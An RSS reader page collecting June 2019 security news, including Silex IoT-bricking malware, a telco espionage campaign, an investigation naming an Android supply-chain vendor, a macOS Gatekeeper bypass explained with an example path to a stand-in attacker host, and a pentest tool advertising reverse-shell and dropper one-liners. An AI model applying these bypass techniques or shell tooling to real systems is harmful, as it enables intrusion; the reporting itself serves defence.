RSS Security

🔒
❌ About FreshRSS
There are new available articles, click to refresh the page.
Today — June 26th 2019Your RSS feeds

Silex malware bricks thousands of IoT devices in a few hours

Security experts warn of a new piece of the Silex malware that is bricking thousands of IoT devices, and the situation could rapidly go worse.

Akamai researcher Larry Cashdollar discovered a new piece of the Silex malware that is bricking thousands of IoT devices, over 2,000 devices have been bricked in a few hours and the expert is continuing to see new infections.

Cashdollar explained that the Silex malware trashes the storage of the infected devices, drops firewall rules and wipe network configurations before halting the system.

It's trashing the storage, dropping the iptables rules, removing the network configuration and then halting the device. pic.twitter.com/Ue661ku0fy

— Larry W. Cashdollar (@_larry0) June 25, 2019

The only way to recover infected devices is to manually reinstall the device’s firmware.

Silex is not the first IoT malware with this behavior, back in 2017 BrickerBot bricked millions of devices worldwide.

According to ZDnet that interviewed the malware’s creator, the attacks are about to intensify in the coming days.

“The malware had bricked around 350 devices when this reporter began investigating its operations, and the number quickly spiked to 2,000 wiped devices by the time we published, an hour later.” reported ZDnet.

“Attacks are still ongoing, and according to an interview with the malware’s creator, they are about to intensify in the coming days.”

The researcher Ankit Anubhav was also able to trace the attacker and confirmed that the bot was developed to brick the infected IoT devices.

Traced the attacker who has claimed responsibility and also claiming to brick 361 devices. Will try to interview him. What we speculated is right, this is a bot to cause bricking ( which the attacker says as PDOS, permanent DOS)

There is no financial motive. pic.twitter.com/gUjWCdSIQO

— Ankit Anubhav (@ankit_anubhav) June 25, 2019

Anubhav believes that the Silex malware was developed by a teenager using the online moniker of Light Leafon. The same guy has also created the ITO IoT botnet,

According to Cashdollar, the Silex malware uses a list of known default credentials for IoT devices in the attempt to log in and perform malicious actions. The malware writes random data from /dev/random to any mounted storage it finds.

“I see in the binary it’s calling fdisk -l which will list all disk partitions,” Cashdollar told ZDNet. “It then writes random data from /dev/random to any partitions it discovers.”

The malware also deletes network settings and any other data on the device, then it flushes all iptables entries before halting or rebooting the device.

Silex malware

The IoT malware is targeting any Unix-like system with default login credentials, according to Cashdollar it leverages a Bash shell version to target any architecture running a Unix like OS.

The malware could brick Linux servers having Telnet ports open that use known credentials.

The IP address (185[.]162[.]235[.]56) behind the attacks observed by the experts is hosted on a VPS server owned by novinvps.com, which is operated out of Iran.

According to Ankit Anubha who spoke with the author of the malware, the developer has definitively abandoned the HITO botnet for Silex and plans to implement other destructive features (SSH hijacking capability, add exploits into Silex).

At the time it is not clear the Light’s motivation for these attacks, let’s hope he will use his talent for legal and good projects.

Pierluigi Paganini

(SecurityAffairs – Silex malware, hacking)

The post Silex malware bricks thousands of IoT devices in a few hours appeared first on Security Affairs.

Operation Soft Cell – Multiple telco firms hacked by nation-state actor

Operation Soft Cell – Experts at Cybereason discovered that China-linked hackers have breached numerous telco providers controlling their networks.

Researchers at Cybereason uncovered an ongoing long-running espionage campaign, tracked as Operation Soft Cell, that targets telco providers. Tactics, techniques, and procedures, and the type of targets suggest the involvement of a nation-state actor likely linked to Chinese APT10.

Once compromised the networks of telecommunication companies, attackers can access to mobile phone users’ call data records.

“Based on the data available to us, Operation Soft Cell has been active since at least 2012, though some evidence suggests even earlier activity by the threat actor against telecommunications providers. The attack was aiming to obtain CDR records of a large telecommunications provider.” reads the report published by Cybereason.

“The threat actor was attempting to steal all data stored in the active directory, compromising every single username and password in the organization, along with other personally identifiable information, billing data, call detail records, credentials, email servers, geo-location of users, and more.”

Torpedo attack

According to Amit Serper, head of security research at Cybereason, attackers exfiltrated gigabytes of data from the target networks, but always in relatively smaller amounts to remain under the radar.

Experts explained that attackers did not exfiltrate the entire archives of the telco companies, instead, they accessed to the data by querying the systems from within the target network.

Attack scenario sees hackers planting a malicious web shell on an IIS server, identified as a modified version of the China Chopper web shell, that was used to run reconnaissance commands, steal credentials, and deploy other hacking tools.

Then attackers launched a series of reconnaissance commands to gather information about the target infrastructure (i.e. machines within the network, network architecture, users, and active directory enumeration).

Hackers also used a modified version of Nbtscan to determine the availability of NetBIOS name servers locally or over the network. The attackers also used multiple Windows built-in tools (i.e. whoami, net.exe, ipconfig, netstat, portqry) and WMI and PowerShel commands.

The threat actors also used Poison Ivy RAT to maintain long-term access across the compromised network, and a modified version of Mimikatz to dump credentials. WMI and PsExec were used by the hackers for lateral movement, while Winrar was used to compress and password-protect stolen data, and a modified version of hTran was used to exfiltrate the data.

operation soft cell

Experts believe that hundreds of millions of mobile phone users around the world have been affected, including foreign intelligence agents, politicians, opposition candidates for espionage.

“Beyond targeting individual users, this attack is also alarming because of the threat posed by the control of a telecommunications provider. Telecommunications has become critical infrastructure for the majority of world powers. A threat actor with total access to a telecommunications provider, as is the case here, can attack however they want passively and also actively work to sabotage the network.” concludes the analysis.

“This attack has widespread implications, not just for individuals, but also for organizations and countries alike.”

Pierluigi Paganini

(SecurityAffairs – telco firms, operation soft cell)

The post Operation Soft Cell – Multiple telco firms hacked by nation-state actor appeared first on Security Affairs.

Yesterday — June 25th 2019Your RSS feeds

Tourmaline - Telegram Bot Framework For Crystal

By: Unknown

Telegram Bot (and hopefully soon Client) API framework for Crystal. Based heavily off of Telegraf this Crystal implementation allows your Telegram bot to be written in a language that's both beautiful and fast. Benchmarks coming soon.
If you want to extend your bot by using NLP, see my other library Cadmium.

Installation
Add this to your application's shard.yml:
dependencies:
tourmaline:
github: watzon/tourmaline
version: ~> 0.7.0

Usage

Basic usage
require "tourmaline/bot"

alias TGBot = Tourmaline::Bot

bot = TGBot::Client.new(ENV["API_KEY"])

bot.command(["start", "help"]) do |message|
text = "Echo bot is a sample bot created with the Tourmaline bot framework."
bot.send_message(message.chat.id, text)
end

bot.command("echo") do |message, params|
text = params.join(" ")
bot.send_message(message.chat.id, text)
end

bot.poll

Listening for events
Tourmaline has a number of events that you can listen for (the same events as Telegraf actually). The full list of events is as can be found in the documentation.
bot.on(:text) do |update|
text = update.message.not_nil!.text.not_nil!
puts "TEXT: #{text}"
end

Adding middleware
Middleware can be created by extending the Tourmaline::Bot::Middleware class. All middleware classes need to have a call(update : Update) method. The middleware will be called on every update.
class MyMiddleware < TGBot::Middleware

# All middlware include a reference to the parent bot.
# @bot : Tourmaline::Bot::Client

def call(update : Update)
if message = update.message
if user = message.from_user
if text = message.text
puts "#{user.first_name}: #{text}"
end
end
end
end

end

bot.use MyMiddleware

Webhooks
Using webhooks is easy, even locally if you use the ngrok.cr package.
# bot.poll

bot.set_webhook("https://example.com/bots/my_tg_bot")
bot.serve("0.0.0.0", 3400)

# or with ngrok.cr

require "ngrok"

Ngrok.start({ addr: "127.0.0.1:3400" }) do |ngrok|
bot.set_webhook(ngrok.ngrok_url_https)
bot.serve("127.0.0.1", 3400)
end

Payments
You can now accept payments with your Tourmaline app! First make sure you follow the setup instructions here so that your bot is prepared to handle payments. Then just use the send_invoice, answer_shipping_query, and answer_pre_checkout_query methods to send invoices and accept payments.
bot.command("buy") do |message, params|
bot.send_invoice(
message.chat.id,
"Sample Invoice",
"This is a test...",
"123344232323",
"YOUR_PROVIDER_TOKEN",
"test1",
"USD",
bot.labeled_prices([{label: "Sample", amount: 299}, {label: "Another", amount: 369}]).to_json
)
end

Games
Ability to create and run games with your Tourmaline Bot is a recent feature that hasn't been tested yet. Please use the issue tracker if you experience problems.

Kemal Middleware
Tourmaline provides middleware for Kemal, just in case you want to use Kemal as the server.
require "kemal"
require "tourmaline/kemal/tourmaline_handler"

require "./your_bot"

add_handler Kemal::TourmalineHandler.new(
bot: YourBot.new,
url: "https://something.com",
path: "/bot-webhook/#{ENV["TGBOT_API_KEY"]}"
)

Kemal.run
Note: Telegram won't send webhook requests to non-ssl domains. This means that you need to be running your kemal server with ssl enabled. For local development this can be a pain, but it is made much easier with ngrok.cr.

Development
This currently supports the following features:
  • Bot API
    • Implementation examples
    • Easy command syntax
    • Robust middleware system
    • Standard API queries
    • Stickers
    • Inline mode
    • Long polling
    • Webhooks
    • Payments
    • Games
  • Client API (in development)
If you want a new feature feel free to submit an issue or open a pull request.

Contributing
  1. Fork it ( https://github.com/watzon/tourmaline/fork )
  2. Create your feature branch (git checkout -b my-new-feature)
  3. Commit your changes (git commit -am 'Add some feature')
  4. Push to the branch (git push origin my-new-feature)
  5. Create a new Pull Request

Contributors
  • watzon Chris Watson - creator, maintainer


Tracing the Supply Chain Attack on Android

Earlier this month, Google disclosed that a supply chain attack by one of its vendors resulted in malicious software being pre-installed on millions of new budget Android devices. Google didn’t exactly name those responsible, but said it believes the offending vendor uses the nicknames “Yehuo” or “Blazefire.” What follows is a deep dive into the identity of that Chinese vendor, which appears to have a long and storied history of pushing the envelope on mobile malware.

“Yehuo” () is Mandarin for “wildfire,” so one might be forgiven for concluding that Google was perhaps using another dictionary than most Mandarin speakers. But Google was probably just being coy: The vendor in question appears to have used both “blazefire” and “wildfire” in two of many corporate names adopted for the same entity.

An online search for the term “yehuo” reveals an account on the Chinese Software Developer Network which uses that same nickname and references the domain blazefire[.]com. More searching points to a Yehuo user on gamerbbs[.]cn who advertises a mobile game called “Xiaojun Junji,” and says the game is available at blazefire[.]com.

Research on blazefire[.]com via Domaintools.com shows the domain was assigned in 2015 to a company called “Shanghai Blazefire Network Technology Co. Ltd.” just a short time after it was registered by someone using the email address “tosaka1027@gmail.com“.

The Shanghai Blazefire Network is part of a group of similarly-named Chinese entities in the “mobile phone pre-installation business and in marketing for advertisers’ products to install services through mobile phone installed software.”

“At present, pre-installed partners cover the entire mobile phone industry chain, including mobile phone chip manufacturers, mobile phone design companies, mobile phone brand manufacturers, mobile phone agents, mobile terminal stores and major e-commerce platforms,” reads a descriptive blurb about the company.

A historic records search at Domaintools on that tosaka1027@gmail.com address says it was used to register 24 Internet domain names, including at least seven that have been conclusively tied to the spread of powerful Android mobile malware.

Two of those domains registered to tosaka1027@gmail.com — elsyzsmc[.]com and rurimeter[.]com — were implicated in propagating the Triada malware. Triada is the very same malicious software Google said was found pre-installed on many of its devices and being used to install spam apps that display ads.

In July 2017, Russian antivirus vendor Dr.Web published research showing that Triada had been installed by default on at least four low-cost Android models. In 2018, Dr.Web expanded its research when it discovered the Triada malware installed on 40 different models of Android devices.

At least another five of the domains registered to tosaka1027@gmail.com — 99youx[.]com, buydudu[.]com, kelisrim[.]com, opnixi[.]com and sonyba[.]comwere seen as early as 2016 as distribution points for the Hummer Trojan, a potent strain of Android malware often bundled with games that completely compromises the infected device.

A records search at Domaintools for “Shanghai Blazefire Network Technology Co” returns 11 domains, including blazefire[.]net, which is registered to a yehuo@blazefire.net. For the remainder of this post, we’ll focus on the bolded domain names below:

Domain Name      Create Date   Registrar
2333youxi[.]com 2016-02-18 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
52gzone[.]com 2012-11-26 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
91gzonep[.]com 2012-11-26 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
blazefire[.]com 2000-08-24 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
blazefire[.]net 2010-11-22 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
hsuheng[.]com 2015-03-09 GODADDY.COM, LLC
jyhxz.net 2013-07-02 —
longmen[.]com 1998-06-19 GODADDY.COM, LLC
longmenbiaoju[.]com 2012-12-09 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
oppayment[.]com 2013-10-09 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
tongjue[.]net 2014-01-20 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD

Following the breadcrumbs from some of the above domains we can see that “Blazefire” is a sprawling entity with multiple business units and names. For example, 2333youxi[.]com is the domain name for Shanghai Qianyou Network Technology Co., Ltd., a firm that says it is “dedicated to the development and operation of Internet mobile games.”

Like the domain blazefire[.]com, 2333youxi[.]com also was initially registered to tosaka1027@gmail.com and soon changed to Shanghai Blazefire as the owner.

The offices of Shanghai Quianyou Network — at Room 344, 6th Floor, Building 10, No. 196, Ouyang Rd, Shanghai, China — are just down the hall from Shanghai Wildfire Network Technology Co., Ltd., reportedly at Room 35, 6th Floor, Building 10, No. 196, Ouyang Rd, Shanghai.

The domain tongjue[.]net is the Web site for Shanghai Bronze Network Technology Co., Ltd., which appears to be either another name for or a sister company to Shanghai Tongjue Network Technology Co., Ltd.  According to its marketing literature, Shanghai Tongjue is situated one door down from the above-mentioned Shanghai Quianyou Network — at Room 36, 6th Floor, Building 10, No. 196, Ouyang Road.

“It has developed into a large domestic wireless Internet network application,” reads a help wanted ad published by Tongjue in 2016.  “The company is mainly engaged in mobile phone pre-installation business.”

That particular help wanted ad was for a “client software development” role at Tongjue. The ad said the ideal candidate for the position would have experience with “Windows Trojan, Virus or Game Plug-ins.” Among the responsibilities for this position were:

-Crack the restrictions imposed by the manufacturer on the mobile phone.
-Research and master the android [operating] system
-Reverse the root software to study the root of the android mobile phone
-Research the anti-brushing and provide anti-reverse brushing scheme

WHO IS BLAZEFIRE/YEHUO?

Many of the domains mentioned above have somewhere in their registration history the name “Hsu Heng” and the email address yehuo@blazefire.net. Based on an analysis via cyber intelligence firm 4iq.com of passwords and email addresses exposed in multiple data breaches in years past, the head of Blazefire goes by the nickname “Hagen” or “Haagen” and uses the email “chuda@blazefire.net“.

Searching on the phrase “chuda” in Mandarin turns up a 2016 story at the Chinese gaming industry news site Youxiguancha.com that features numerous photos of Blazefire employees and their offices. That story also refers to the co-founder and CEO of Blazefire variously as “Chuda” and “Chu da”.

“Wildfire CEO Chuda is a tear-resistant boss with both sports (Barcelona hardcore fans) and literary genre (playing a good guitar),” the story gushes. “With the performance of leading the wildfire team and the wildfire product line in 2015, Chu has won the top ten new CEO awards from the first Black Rock Award of the Hardcore Alliance.”

Interestingly, the registrant name “Chu Da” shows up in the historical domain name records for longmen[.]com, perhaps Shanghai Wildfire’s oldest and most successful mobile game ever. That record, from April 2015, lists Chu Da’s email address as yehuo@blazefire.com.

The CEO of Wildfire/Blazefire, referred to only as “Chuda” or “Hagen.”

It’s not clear if Chuda is all or part of the CEO’s real name, or just a nickname; the vice president of the company lists their name simply as “Hua Wei,” which could be a real name or a pseudonymous nod to the embattled Chinese telecom giant by the same name.

According to this cached document from Chinese business lookup service TianYanCha.com, Chuda also is a senior executive at six other companies.

Google declined to elaborate on its blog post. Shanghai Wildfire did not respond to multiple requests for comment.

It’s perhaps worth noting that while Google may be wise to what’s cooking over at Shanghai Blazefire/Wildfire Network Technology Co., Apple still has several of the company’s apps available for download from the iTunes store, as well as others from Shanghai Qianyou Network Technology.

Tracing the Supply Chain Attack on Android

Earlier this month, Google disclosed that a supply chain attack by one of its vendors resulted in malicious software being pre-installed on millions of new budget Android devices. Google didn’t exactly name those responsible, but said it believes the offending vendor uses the nicknames “Yehuo” or “Blazefire.” What follows is a deep dive into the identity of that Chinese vendor, which appears to have a long and storied history of pushing the envelope on mobile malware.

“Yehuo” () is Mandarin for “wildfire,” so one might be forgiven for concluding that Google was perhaps using another dictionary than most Mandarin speakers. But Google was probably just being coy: The vendor in question appears to have used both “blazefire” and “wildfire” in two of many corporate names adopted for the same entity.

An online search for the term “yehuo” reveals an account on the Chinese Software Developer Network which uses that same nickname and references the domain blazefire[.]com. More searching points to a Yehuo user on gamerbbs[.]cn who advertises a mobile game called “Xiaojun Junji,” and says the game is available at blazefire[.]com.

Research on blazefire[.]com via Domaintools.com shows the domain was assigned in 2015 to a company called “Shanghai Blazefire Network Technology Co. Ltd.” just a short time after it was registered by someone using the email address “tosaka1027@gmail.com“.

The Shanghai Blazefire Network is part of a group of similarly-named Chinese entities in the “mobile phone pre-installation business and in marketing for advertisers’ products to install services through mobile phone installed software.”

“At present, pre-installed partners cover the entire mobile phone industry chain, including mobile phone chip manufacturers, mobile phone design companies, mobile phone brand manufacturers, mobile phone agents, mobile terminal stores and major e-commerce platforms,” reads a descriptive blurb about the company.

A historic records search at Domaintools on that tosaka1027@gmail.com address says it was used to register 24 Internet domain names, including at least seven that have been conclusively tied to the spread of powerful Android mobile malware.

Two of those domains registered to tosaka1027@gmail.com — elsyzsmc[.]com and rurimeter[.]com — were implicated in propagating the Triada malware. Triada is the very same malicious software Google said was found pre-installed on many of its devices and being used to install spam apps that display ads.

In July 2017, Russian antivirus vendor Dr.Web published research showing that Triada had been installed by default on at least four low-cost Android models. In 2018, Dr.Web expanded its research when it discovered the Triada malware installed on 40 different models of Android devices.

At least another five of the domains registered to tosaka1027@gmail.com — 99youx[.]com, buydudu[.]com, kelisrim[.]com, opnixi[.]com and sonyba[.]comwere seen as early as 2016 as distribution points for the Hummer Trojan, a potent strain of Android malware often bundled with games that completely compromises the infected device.

A records search at Domaintools for “Shanghai Blazefire Network Technology Co” returns 11 domains, including blazefire[.]net, which is registered to a yehuo@blazefire.net. For the remainder of this post, we’ll focus on the bolded domain names below:

Domain Name      Create Date   Registrar
2333youxi[.]com 2016-02-18 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
52gzone[.]com 2012-11-26 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
91gzonep[.]com 2012-11-26 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
blazefire[.]com 2000-08-24 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
blazefire[.]net 2010-11-22 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
hsuheng[.]com 2015-03-09 GODADDY.COM, LLC
jyhxz.net 2013-07-02 —
longmen[.]com 1998-06-19 GODADDY.COM, LLC
longmenbiaoju[.]com 2012-12-09 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
oppayment[.]com 2013-10-09 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
tongjue[.]net 2014-01-20 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD

Following the breadcrumbs from some of the above domains we can see that “Blazefire” is a sprawling entity with multiple business units and names. For example, 2333youxi[.]com is the domain name for Shanghai Qianyou Network Technology Co., Ltd., a firm that says it is “dedicated to the development and operation of Internet mobile games.”

Like the domain blazefire[.]com, 2333youxi[.]com also was initially registered to tosaka1027@gmail.com and soon changed to Shanghai Blazefire as the owner.

The offices of Shanghai Quianyou Network — at Room 344, 6th Floor, Building 10, No. 196, Ouyang Rd, Shanghai, China — are just down the hall from Shanghai Wildfire Network Technology Co., Ltd., reportedly at Room 35, 6th Floor, Building 10, No. 196, Ouyang Rd, Shanghai.

The domain tongjue[.]net is the Web site for Shanghai Bronze Network Technology Co., Ltd., which appears to be either another name for or a sister company to Shanghai Tongjue Network Technology Co., Ltd.  According to its marketing literature, Shanghai Tongjue is situated one door down from the above-mentioned Shanghai Quianyou Network — at Room 36, 6th Floor, Building 10, No. 196, Ouyang Road.

“It has developed into a large domestic wireless Internet network application,” reads a help wanted ad published by Tongjue in 2016.  “The company is mainly engaged in mobile phone pre-installation business.”

That particular help wanted ad was for a “client software development” role at Tongjue. The ad said the ideal candidate for the position would have experience with “Windows Trojan, Virus or Game Plug-ins.” Among the responsibilities for this position were:

-Crack the restrictions imposed by the manufacturer on the mobile phone.
-Research and master the android [operating] system
-Reverse the root software to study the root of the android mobile phone
-Research the anti-brushing and provide anti-reverse brushing scheme

WHO IS BLAZEFIRE/YEHUO?

Many of the domains mentioned above have somewhere in their registration history the name “Hsu Heng” and the email address yehuo@blazefire.net. Based on an analysis via cyber intelligence firm 4iq.com of passwords and email addresses exposed in multiple data breaches in years past, the head of Blazefire goes by the nickname “Hagen” or “Haagen” and uses the email “chuda@blazefire.net“.

Searching on the phrase “chuda” in Mandarin turns up a 2016 story at the Chinese gaming industry news site Youxiguancha.com that features numerous photos of Blazefire employees and their offices. That story also refers to the co-founder and CEO of Blazefire variously as “Chuda” and “Chu da”.

“Wildfire CEO Chuda is a tear-resistant boss with both sports (Barcelona hardcore fans) and literary genre (playing a good guitar),” the story gushes. “With the performance of leading the wildfire team and the wildfire product line in 2015, Chu has won the top ten new CEO awards from the first Black Rock Award of the Hardcore Alliance.”

Interestingly, the registrant name “Chu Da” shows up in the historical domain name records for longmen[.]com, perhaps Shanghai Wildfire’s oldest and most successful mobile game ever. That record, from April 2015, lists Chu Da’s email address as yehuo@blazefire.com.

The CEO of Wildfire/Blazefire, referred to only as “Chuda” or “Hagen.”

It’s not clear if Chuda is all or part of the CEO’s real name, or just a nickname; the vice president of the company lists their name simply as “Hua Wei,” which could be a real name or a pseudonymous nod to the embattled Chinese telecom giant by the same name.

According to this cached document from Chinese business lookup service TianYanCha.com, Chuda also is a senior executive at six other companies.

Google declined to elaborate on its blog post. Shanghai Wildfire did not respond to multiple requests for comment.

It’s perhaps worth noting that while Google may be wise to what’s cooking over at Shanghai Blazefire/Wildfire Network Technology Co., Apple still has several of the company’s apps available for download from the iTunes store, as well as others from Shanghai Qianyou Network Technology.

OSX/Linker, a new piece of Mac malware that exploits Gatekeeper bypass

Mac security software firm Intego has spotted a new Mac malware dubbed OSX/Linker that exploits a recently disclosed macOS Gatekeeper vulnerability.

Experts at Mac security software firm Intego discovered a new piece of Mac malware dubbed OSX/Linker that exploits a recently disclosed macOS Gatekeeper bypass vulnerability.

The Apple Gatekeeper is designed to protect OS X users by performing a number of checks before allowing an App to run. In fact, you will not be able to execute code that wasn’t signed by an Apple developer, you will not be able to run apps that weren’t downloaded from Apple’s store if the device is not jailbreaked of course.

Researchers speculate the Linker malware has the same authors of the OSX/Surfbuyer adware.

In late May, the Italian security researcher Filippo Cavallarin demonstrated how to bypass the macOS Gatekeeper by leveraging trust in network shares.

Cavallarin demonstrated how to bypass Gatekeeper and execute untrusted code without user explicit permission and any warning to the victims.

Gatekeeper considers both external drives and network shares as safe locations, this means that any application in these locations could run without asking for the user’s consent.

In late May, security researcher Filippo Cavallarin disclosed a bug in Gatekeeper that would allow a malicious binary downloaded from the Internet to bypass the Gatekeeper scanning process.

The attacker would need to leverage two legitimate features implemented in macOS, the automount (aka autofs) and the lack of specific checks.

The autofs feature allows a user to automatically mount a network share by accessing a “special” path, in this specific case any path beginning with “/net/” (i.e. /net/evil-attacker.com/sharedfolder/).

The second feature that was exploited to include within ZIP archives symbolic links pointing to arbitrary locations, in this case, automount endpoints.

Cavallarin discovered that the software responsible for decompressing the ZIP archives does not perform any check on the symlinks.

An attacker can create a ZIP file containing a symbolic link to an automount endpoint under their control and send it to the victim. The attack scenario sees the victim downloading the archive and follows the symlink, they are redirected to the location controlled by the attacker that is also trusted by Gatekeeper. 

Below a video PoC of the attack:

The Gatekeeper bypass flaw affects all macOS versions, including the latest one (ver. 10.14.5), and Apple has yet to release an update to address the issue.

Cavallarin reported the vulnerability to Apple on February 22, but Apple missed a 90-days deadline and is no longer responding to the emails of the expert.

Unfortunately, vxers are already working on the includes the exploit code in their malware. Intego experts already analyzed some malware samples that appear as a sort of test for the exploiting of the Gatekeeper bypass.

The disk image files were either an ISO 9660 image with a .dmg file name, or an actual Apple Disk Image format .dmg file.

“Intego observed four samples that were uploaded to VirusTotal on June 6, seemingly within hours of the creation of each disk image, that all linked to one particular application on an Internet-accessible NFS server.” reads the analysis published by Intego.

“Each of the four files were uploaded anonymously, meaning the user was not signed into a VirusTotal account.”

All the OSX/Linker malware samples analyzed by the experts were disguised as Adobe Flash Player installers, a circumstance that suggests they were actual malware payload testing.

At the time of writing, OSX/Linker malware samples haven’t been observed in the wild yet.

Intego notified Apple of the OSX/Surfbuyer adware gang abusing an Apple Developer ID to sign their malicious OSX/Linker samples in order to allow the tech giant to revoke the abused certificate.

Pierluigi Paganini

(SecurityAffairs – OSX/Linker, malware)

The post OSX/Linker, a new piece of Mac malware that exploits Gatekeeper bypass appeared first on Security Affairs.

Penetration tester resume tips

Introduction Resumes are the window that organizations use to see what candidates have to offer and are used to filter all who interview for job positions. You can also think of resumes as the face of your career up to this point: it should show an organization what you can do for them from just […]

The post Penetration tester resume tips appeared first on Infosec Resources.


Penetration tester resume tips was first posted on June 25, 2019 at 8:02 am.
©2017 "InfoSec Resources". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement. Please contact me at darren.dalasta@infosecinstitute.com

Penetration tester salary

Introduction For some, aiming for one of the most glamorous or cool jobs is their cup of tea, and for many in information security their equivalent role is penetration tester. Much like an action movie in the vein of “Mission Impossible,” you’ll get to hack into computer systems for a legitimate purpose.  The question then […]

The post Penetration tester salary appeared first on Infosec Resources.


Penetration tester salary was first posted on June 25, 2019 at 8:01 am.
©2017 "InfoSec Resources". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement. Please contact me at darren.dalasta@infosecinstitute.com

Penetration tester career path

Introduction Are you interested in a career as penetration tester? If you have “a thorough understanding of pentesting methodologies and vulnerability assessments, as well as the ability to exploit systems and effectively communicate findings,” then this might be the right field for you. How does an IT professional become a penetration tester? There is no […]

The post Penetration tester career path appeared first on Infosec Resources.


Penetration tester career path was first posted on June 25, 2019 at 8:00 am.
©2017 "InfoSec Resources". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement. Please contact me at darren.dalasta@infosecinstitute.com

One-Lin3r v2.0 - Gives You One-Liners That Aids In Penetration Testing Operations, Privilege Escalation And More

By: Zion3R

One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).

Screenshots




It consists of various one-liners types with various functions, some of them are:
One-liner function What this function refers to
Reverse Shell Various methods and commands to give you a reverse shell.
PrivEsc Many commands to help in Enumeration and Privilege Escalation
Bind Shell Various methods and commands to give you a bind shell.
Dropper Many ways to download and execute various payload types with various methods.

Features
  • A lot of liners use with different purposes, currently are more than 155 liner.
  • The auto-complete feature that has been implemented in this framework is not the usual one you always see, here are some highlights:
    • It's designed to fix typos in typed commands to the most similar command with just one tab click so seach becomes search and so on, even if you typed any random word similar to an command in this framework.
    • For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!
    • If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.
    • Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.
    • Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...
  • Automation
    • You can automatically copy the liner you want to clipboard with command copy <liner> instead of using use <liner> and then copying it which saves a lot of time, of course, if you merged it with the following features.
    • As you may noticed, you can use a resource file from command-line arguments before starting the framework itself or send commands directly.
    • Inside the framework you can use makerc command like in Metasploit but this time it only saves the correct important commands.
    • There are history and resource commands so you don't need to exit the framework.
    • You can execute as many commands as you want at the same time by splitting them with semi-colon.
    • Searching for any liner here is so easy, you can search for a liner by its name, function or even the liner author name.
  • You can add your own liners by following these steps to create a liner as a python file. After that you can make a Pull request with it then it will be added in the framework and credited with your name of course .
  • The ability to reload the database if you added any liner without restarting the framework.
  • You can add any platform to the liners database just by making a folder in liners folder and creating a ".liner" file there.
  • More...
Note: The liners database is not too big but it will get bigger with updates and contributions.

Usage

f Command-line arguments
usage: one-lin3r [-h] [-r R] [-x X] [-q]

optional arguments:
-h, --help show this help message and exit
-r Execute a resource file (history file).
-x Execute a specific command (use ; for multiples).
-q Quiet mode (no banner).

Framework commands
Command                 Description
-------- -------------
help/? Show this help menu.
list/show List all one-liners in the database.
search [Keywords..] Search database for a specific liner by its name, author name or description.
use <liner> Use an available one-liner.
copy <liner> Use an available one-liner and copy it to clipboard automatically.
info <liner> Get information about an available liner.
set <variable> <value> Sets a context-specific variable to a value to use while using one-liners.
variables Prints all previously specified variables.
banner Display banner.
reload/refresh Reload the liners database.
check Prints the core version and checks if you are up-to-date.
history Display command-line most important history from t he beginning.
makerc Save command-line history to a file.
resource <file> Run the commands stored in a file
os <command> Execute a system command without closing the framework
exit/quit Exit the framework

Prerequisites before installing
  • Python 3.x.
  • Any OS, it should work on all but it's tested on Kali 2018+, Ubuntu 18+, Windows 10, Android with termux and MacOs 10.11

Installing and running
  • Using pip (The best way to install on any OS):
pip install one-lin3r
one-lin3r -h
  • Installing it from GitHub:
    • For windows : (After downloading ZIP and upzip it)
    python -m pip install ./One-Lin3r-master
    one-lin3r -h
    • For Linux :
    git clone https://github.com/D4Vinci/One-Lin3r.git
    apt install libncurses5-dev
    pip3 install ./One-Lin3r
    one-lin3r -h

Updating the framework or the database
  • If you installed it from pip do:
pip install one-lin3r --upgrade
  • If you installed it from github do:
    • On Linux while outside the directory
    cd One-Lin3r && git pull && cd ..
    pip3 install ./One-Lin3r --upgrade
    • On Windows if you don't have git installed, redownload the framework zipped!
Note: As the liners are written as python modules, it considered as a part of the framework. So every new liner added to the framework, its version will get updated.

Contact

Credits and references


Anonymous Belgium hacker identified after dropping USB drive while throwing Molotov cocktail

Belgium police have identified a member of the Anonymous Belgium collective while investigating an arson case at a local bank.

The Anonymous member is a 35-year-old man from Roeselare, Belgium, was arrested after throwing a Molotov cocktail at the Crelan Bank office in Rumbeke, back in 2014.

According to ZDnet, the hacker has been exposed after dropping USB drive on the ground while throwing the Molotov cocktail.

The analysis of the content of the USB drive allowed the authorities to identify the man. Court documents refer to the hacktivist as a Brecht S., the police raided his house and investigated into his computer and electronic devices revealing a long cybercrime activity.

Anonymous Belgium

The member of Anonymous was also involved in DDoS attacks against online banking system of the Crelan Bank that shut down the portal on numerous occasions.

Brecht explained that he attacked the bank because its officials refused to meet with him following the disappearance of €300,000 from his mother’s bank account following the divorce from his father. The attack was a revenge for what has happened to his mother.

The man also stated that he was experiencing a difficult period at the time and was involved in drugs.

